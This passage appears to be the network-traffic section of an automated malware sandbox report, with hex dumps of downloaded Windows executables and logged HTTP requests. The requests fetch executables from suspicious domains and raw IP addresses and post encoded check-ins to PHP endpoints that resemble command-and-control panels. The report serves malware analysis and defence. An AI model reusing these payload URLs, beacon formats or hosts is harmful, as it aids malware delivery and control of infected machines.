19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 27 Jun 2024 03:59:31 GMTContent-Type: application/x-msdos-programContent-Length: 257872Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 27 Jun 2024 03:59:31 GMTContent-Type: application/x-msdos-programContent-Length: 80880Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 27 Jun 2024 03:59:46 GMTContent-Type: application/octet-streamContent-Length: 523264Last-Modified: Tue, 25 Jun 2024 13:08:13 GMTConnection: keep-aliveETag: "667ac13d-7fc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 74 0c c0 e7 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 f0 07 00 00 08 00 00 00 00 00 00 32 68 03 00 00 20 00 00 00 20 08 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 08 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e0 67 03 00 4f 00 00 00 00 20 08 00 98 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 08 00 0c 00 00 00 c4 67 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 48 ec 07 00 00 20 00 00 00 f0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 03 00 00 00 20 08 00 00 04 00 00 00 f4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 08 00 00 04 00 00 00 f8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 27 Jun 2024 03:59:47 GMTContent-Type: application/octet-streamContent-Length: 2608640Last-Modified: Thu, 14 Sep 2023 14:14:56 GMTConnection: keep-aliveETag: "65031560-27ce00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 07 00 5f 39 74 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 6e 00 00 00 5c 27 00 00 00 00 00 40 11 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 28 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 88 91 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 f0 27 00 74 01 00 00 00 00 00 00 00 00 00 00 00 20 28 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 80 00 00 28 00 00 00 10 84 00 00 38 01 00 00 00 00 00 00 00 00 00 00 20 93 00 00 58 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 6d 00 00 00 10 00 00 00 6e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b8 18 00 00 00 80 00 00 00 1a 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f0 44 27 00 00 a0 00 00 00 3a 27 00 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 74 01 00 00 00 f0 27 00 00 02 00 00 00 c6 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 10 00 00 00 00 00 28 00 00 02 00 00 00 c8 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 10 00 00 00 00 10 28 00 00 02 00 00 00 ca 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 78 00 00 00 00 20 28 00 00 02 00 00 00 cc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /George.exe HTTP/1.1Host: moreapp4you.onlineConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /frielandrews892/File/releases/download/installer/Installer.exe HTTP/1.1Host: github.com
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/815364555/3f12ea9a-79fa-40c4-802f-9bbddfc164da?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240627%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240627T035854Z&X-Amz-Expires=300&X-Amz-Signature=8324c918359c5367cfdc1d9d5eef365178e8f36844b683c69ab0dfb51d1fff3b&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=815364555&response-content-disposition=attachment%3B%20filename%3DInstaller.exe&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tmp/1.exe HTTP/1.1Host: biancolevrin.com
Source: global traffic	HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 77.91.77.81Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: GET /lend/gold.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 33 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000035001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /NewLatest.exe HTTP/1.1Host: 185.172.128.116
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 36 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000064001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000091001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /wp-includes/ldr.exe HTTP/1.1Host: 94.228.166.74
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 31 30 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000108001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /lend/alex5555555.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 31Cache-Control: no-cacheData Raw: 65 31 3d 31 30 30 30 30 32 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1000020001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 31 30 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000109001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: GET /lend/123.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: 